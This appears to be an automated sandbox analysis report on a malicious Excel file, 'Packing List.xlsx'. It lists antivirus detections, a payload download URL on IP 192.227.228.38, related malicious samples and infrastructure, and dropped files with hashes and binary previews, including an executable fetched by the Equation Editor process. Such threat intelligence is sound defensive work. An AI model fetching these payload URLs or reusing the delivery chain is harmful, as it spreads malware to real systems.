    6.0.vbc.exe.400000.26.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.400000.22.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.400000.12.unpack100%AviraHEUR/AGEN.1130366Download File
    6.0.vbc.exe.400000.14.unpack100%AviraHEUR/AGEN.1130366Download File
    5.2.vbc.exe.30b0000.5.unpack100%AviraW32/Delf.IDownload File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.%s.comPA0%URL Reputationsafe
    http://192.227.228.38/0078/vbc.exe0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://192.227.228.38/0078/vbc.exetrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.%s.comPAvbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    		low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmpfalse
      		high
      http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.drfalse
        		high
        http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000005.00000000.468788902.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.drfalse
          		high

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          192.227.228.38
          		unknownUnited States
          		36352AS-COLOCROSSINGUStrue

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:510251
          Start date:27.10.2021
          Start time:16:32:11
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 6m 54s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:Packing List.xlsx
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:9
          Number of new started drivers analysed:1
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.expl.evad.winXLSX@6/20@0/1
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 81.7% (good quality ratio 77.5%)
          • Quality average: 81.3%
          • Quality standard deviation: 28.5%
          HCA Information:Failed
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .xlsx
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, vga.dll, WMIADAP.exe, svchost.exe
          • TCP Packets have been reduced to 100

          Simulations

          Behavior and APIs

          TimeTypeDescription
          16:32:45API Interceptor68x Sleep call for process: EQNEDT32.EXE modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          192.227.228.38Copy of Packing list.xlsxGet hashmaliciousBrowse
          • 192.227.228.38/0002/vbc.exe
          ZbSq7CdOUj.rtfGet hashmaliciousBrowse
          • 192.227.228.38/0080008/vbc.exe
          Hans Company Profile Introduction.docxGet hashmaliciousBrowse
          • 192.227.228.38/0080008/vbc.exe
          statement of account.xlsxGet hashmaliciousBrowse
          • 192.227.228.38/007007/vbc.exe

          Domains

          No context

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          AS-COLOCROSSINGUSWire_Slip.xlsxGet hashmaliciousBrowse
          • 198.23.207.126
          Product List.xlsxGet hashmaliciousBrowse
          • 198.12.84.79
          Wire Slip.xlsxGet hashmaliciousBrowse
          • 198.23.207.126
          REIGHT USD INV1191189.xlsxGet hashmaliciousBrowse
          • 107.172.13.131
          0091.xlsxGet hashmaliciousBrowse
          • 198.23.207.126
          2TkB2NqXCrGet hashmaliciousBrowse
          • 23.94.7.197
          zzTPBS20ETGet hashmaliciousBrowse
          • 23.94.7.197
          89pORI97Y0Get hashmaliciousBrowse
          • 23.94.7.197
          ute6vN10U5Get hashmaliciousBrowse
          • 23.94.7.197
          MV0uBqNa6fGet hashmaliciousBrowse
          • 23.94.7.197
          pNKZQ55tRWGet hashmaliciousBrowse
          • 23.94.7.197
          QAxi5UqBjKGet hashmaliciousBrowse
          • 23.94.7.197
          buM12G4dfwGet hashmaliciousBrowse
          • 23.94.7.197
          ff9gc08m8kGet hashmaliciousBrowse
          • 23.94.7.197
          Requested Items.xlsxGet hashmaliciousBrowse
          • 192.227.158.118
          Euro_payment.xlsxGet hashmaliciousBrowse
          • 23.94.159.219
          SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
          • 198.46.199.161
          Unpaid invoice 76810091.xlsxGet hashmaliciousBrowse
          • 107.172.13.131
          DHL Receipt_AWB811470484778.xlsxGet hashmaliciousBrowse
          • 198.12.84.79
          Remittance_Advice_USD35,949.xlsxGet hashmaliciousBrowse
          • 104.168.32.50

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Category:downloaded
          Size (bytes):235529
          Entropy (8bit):7.915461873573666
          Encrypted:false
          SSDEEP:6144:wBlL/c2HMSZ54elOp0S4jfEpGibIsdpwBQ:Ce2HMSZWeO0S4Mh0gS6
          MD5:DF330AB2A2E5AA4AC947315EE3F93992
          SHA1:76B5D1EEE342B47FE58E2136A067712CBD210351
          SHA-256:99A897C5B8F53E1D04E51107C748A4F385B754A852CA6B605559F5B50820A64F
          SHA-512:E65F573D68E8F198024028D553210095173D1551E6074B60D9543977116A0286F75641F4692049A49E6CD03729B001027136419D6CF0C71645E800D5522ED895
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Reputation:low
          IE Cache URL:http://192.227.228.38/0078/vbc.exe
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\251FF695.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 550 x 360, 8-bit colormap, non-interlaced
          Category:dropped
          Size (bytes):15625
          Entropy (8bit):7.975433466796902
          Encrypted:false
          SSDEEP:384:3quMy4uOwJYk5DcUWbdfFZBa7Q9bvC78yPelujgXolFo:6Zk5DcU+FXhavB/lFo
          MD5:79996F390643F9E11F14334A3740FA5E
          SHA1:3A99EC9B5E2057264FFE629D3ABA182912EDB80E
          SHA-256:406EE07DA7DEB2B38B87074EA55980BFE3FEFBD57E50AE7D25502D67A711B15C
          SHA-512:BDD3DB6E24418C0F8B74D79F3B0DDFFAF96A5CD2ABE0D45AEEC5E53EA17B0AD17B239C26781FD5BE34CAC3582F24773BF3FEF0616F6BE024117C1A2DB9A3F0B2
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: .PNG........IHDR...&...h.....T......bPLTE..."...P........{......P]............Fx....]..i..bb...,...........K.....................}..........=.....3.....srs...k.....QPR.~.........es.??@...keb"u.]\]x..1h......td..{.....**,...A..odz.....*Q..qAXf............>............u...hXr.y......MTx......R..l..........................K8V%[......=.9nwQT..9.........._=..>.y.^LA.(...R.....;bIDATx..X.o.@.....G..E...6,F.M..T...UZ,!Y!...fIH(........h.?.k..x...%....P...D!...L..2).....G..c.d.+......&:.+........OQ..._..T......%>......e%4.fR......t.3..w..$Xp.6........L..=.vu.X..6......*.W.G.4..Y.c.*...2c....|i....#...~_.Z.66}....l.\...... .L|..zk.G.."..)8. .&&....SN(.7...W...m_ J...<<..$..k.B.F...Q....hs.2!I.s..T...7e4D....E...c.bDl!...C.....t#...*p7.U.#t...32......uy;.....j'.j.#.G.C.. Z...(V.j.#|..b...o.....R=....t.0Wf.r..?..c..R..9.........i.j.y[...A.c.F.uO.M.j...&.q..9T..k.-.+.<.zZ.<...6..rT..W..]..St._....h5^..2.3F.....r~+.8z.......+..[<..._.8...8v....`.o
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27DB9FE4.emf
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):1099960
          Entropy (8bit):2.015321809949325
          Encrypted:false
          SSDEEP:3072:kXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:CahIFdyiaT2qtXl
          MD5:C68C54CBF6E515EC83B659DC674D2013
          SHA1:AF1569EFB4539B1DB71B3D023869D4DB7AA133A8
          SHA-256:986959C09FA256369BA2D9DEF03B2A661E745E470FE8E196EE79A7083CE80869
          SHA-512:B195F95DAB6C4C4B469803FA66257BB8600F1F9F53C3139F3E5858763629CFF5E13DB51B5690CAC473EBA153D482C43228AA668157F7392B65E594AFE999E6C0
          Malicious:false
          Reputation:low
          Preview: ....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Z$.......f.Z.@\.%.............L.....RQ.[L..D.........0..$Q.[L..D.. ...Id.ZD..L.. ............d.Z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...D..x...8.Z........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5268BA6B.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 838 x 469, 8-bit colormap, non-interlaced
          Category:dropped
          Size (bytes):21987
          Entropy (8bit):7.952828365949915
          Encrypted:false
          SSDEEP:384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
          MD5:5A25F525D9F0D658AF52A4F78FE031D4
          SHA1:525FB63F75E745FBC90E4E42E624E030C5DF94EB
          SHA-256:D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
          SHA-512:FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: .PNG........IHDR...F................PLTE...0.....T[c..........................f..................9.....d.........k9u....b...........9....f..kr............t.......e.......9....]X........./.;9.................h..........d.<...({...........t_.....................c7..Ga.06?....._..V.....T..............9......e......ee...........f......:;.D."...h..............e...............Q....E.......l..~..t"....D.............................:....9...........T.........^..d9;....iv...09.Z...........................................................................$...ee9h.G..........................................~........................................;<.........`....................99....5..............................................................AL...R.IDATx...`..&.H......-@.n..]A... ..Fn.!`$X..&&..X@$c..dl<.#...PD....$&".1..h.N..Y3..L6.d.$.XFw..;&(a....=.:..Z].].Q....S..;.?...W%.D....1..s.!....4....`{U'.QU........~.e.*....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67EFF2A.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
          Category:dropped
          Size (bytes):83904
          Entropy (8bit):7.986000888791215
          Encrypted:false
          SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
          MD5:9F9A7311810407794A153B7C74AED720
          SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
          SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
          SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: .PNG........IHDR.............oi......IDATx..u|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.*....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v*:.....M......YUe.N....TI.*..]NQ.<..vm....o....|yt:......P..d.]....bE.zr.....*UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6EA2EAB1.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):68702
          Entropy (8bit):7.960564589117156
          Encrypted:false
          SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
          MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
          SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
          SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
          SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
          Malicious:false
          Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\731170FE.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
          Category:dropped
          Size (bytes):85020
          Entropy (8bit):7.2472785111025875
          Encrypted:false
          SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
          MD5:738BDB90A9D8929A5FB2D06775F3336F
          SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
          SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
          SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
          Malicious:false
          Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84D2F0C8.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
          Category:dropped
          Size (bytes):85020
          Entropy (8bit):7.2472785111025875
          Encrypted:false
          SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
          MD5:738BDB90A9D8929A5FB2D06775F3336F
          SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
          SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
          SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
          Malicious:false
          Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9950728D.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 838 x 469, 8-bit colormap, non-interlaced
          Category:dropped
          Size (bytes):21987
          Entropy (8bit):7.952828365949915
          Encrypted:false
          SSDEEP:384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
          MD5:5A25F525D9F0D658AF52A4F78FE031D4
          SHA1:525FB63F75E745FBC90E4E42E624E030C5DF94EB
          SHA-256:D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
          SHA-512:FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
          Malicious:false
          Preview: .PNG........IHDR...F................PLTE...0.....T[c..........................f..................9.....d.........k9u....b...........9....f..kr............t.......e.......9....]X........./.;9.................h..........d.<...({...........t_.....................c7..Ga.06?....._..V.....T..............9......e......ee...........f......:;.D."...h..............e...............Q....E.......l..~..t"....D.............................:....9...........T.........^..d9;....iv...09.Z...........................................................................$...ee9h.G..........................................~........................................;<.........`....................99....5..............................................................AL...R.IDATx...`..&.H......-@.n..]A... ..Fn.!`$X..&&..X@$c..dl<.#...PD....$&".1..h.N..Y3..L6.d.$.XFw..;&(a....=.:..Z].].Q....S..;.?...W%.D....1..s.!....4....`{U'.QU........~.e.*....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4C845BC.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
          Category:dropped
          Size (bytes):11303
          Entropy (8bit):7.909402464702408
          Encrypted:false
          SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
          MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
          SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
          SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
          SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
          Malicious:false
          Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3B5F0E7.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 550 x 360, 8-bit colormap, non-interlaced
          Category:dropped
          Size (bytes):15625
          Entropy (8bit):7.975433466796902
          Encrypted:false
          SSDEEP:384:3quMy4uOwJYk5DcUWbdfFZBa7Q9bvC78yPelujgXolFo:6Zk5DcU+FXhavB/lFo
          MD5:79996F390643F9E11F14334A3740FA5E
          SHA1:3A99EC9B5E2057264FFE629D3ABA182912EDB80E
          SHA-256:406EE07DA7DEB2B38B87074EA55980BFE3FEFBD57E50AE7D25502D67A711B15C
          SHA-512:BDD3DB6E24418C0F8B74D79F3B0DDFFAF96A5CD2ABE0D45AEEC5E53EA17B0AD17B239C26781FD5BE34CAC3582F24773BF3FEF0616F6BE024117C1A2DB9A3F0B2
          Malicious:false
          Preview: .PNG........IHDR...&...h.....T......bPLTE..."...P........{......P]............Fx....]..i..bb...,...........K.....................}..........=.....3.....srs...k.....QPR.~.........es.??@...keb"u.]\]x..1h......td..{.....**,...A..odz.....*Q..qAXf............>............u...hXr.y......MTx......R..l..........................K8V%[......=.9nwQT..9.........._=..>.y.^LA.(...R.....;bIDATx..X.o.@.....G..E...6,F.M..T...UZ,!Y!...fIH(........h.?.k..x...%....P...D!...L..2).....G..c.d.+......&:.+........OQ..._..T......%>......e%4.fR......t.3..w..$Xp.6........L..=.vu.X..6......*.W.G.4..Y.c.*...2c....|i....#...~_.Z.66}....l.\...... .L|..zk.G.."..)8. .&&....SN(.7...W...m_ J...<<..$..k.B.F...Q....hs.2!I.s..T...7e4D....E...c.bDl!...C.....t#...*p7.U.#t...32......uy;.....j'.j.#.G.C.. Z...(V.j.#|..b...o.....R=....t.0Wf.r..?..c..R..9.........i.j.y[...A.c.F.uO.M.j...&.q..9T..k.-.+.<.zZ.<...6..rT..W..]..St._....h5^..2.3F.....r~+.8z.......+..[<..._.8...8v....`.o
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D937B123.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):68702
          Entropy (8bit):7.960564589117156
          Encrypted:false
          SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
          MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
          SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
          SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
          SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
          Malicious:false
          Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
          C:\Users\user\AppData\Local\Temp\dobvw7pi71yxrkawv
          Process:C:\Users\Public\vbc.exe
          File Type:data
          Category:dropped
          Size (bytes):208895
          Entropy (8bit):7.98543476844833
          Encrypted:false
          SSDEEP:3072:v4b9C1Ilb0lpljlxjlllllllllllllllpElEa8ObNxMizWQc7ibsalh2yyXDUwC7:+kjZObEVQNZlh2VoD6ghTFrj5eM
          MD5:C18BE7539F4915669E9EA3DAA057DDCF
          SHA1:DF46D7153A977EF06D55F6BF79E9641CC166734E
          SHA-256:6B780DFC77A0F9894AEBF1322FB264C1B1E58E5A006543C7493CB7879B8F2231
          SHA-512:92E4E7A8B890418B829F1A4DD643980A21EC7755CC8A7DD5E96593FE43870288616AE3E5CB1F12B16C18824C09BA7F1E9D577A0247163BD05975D782F6E6B460
          Malicious:false
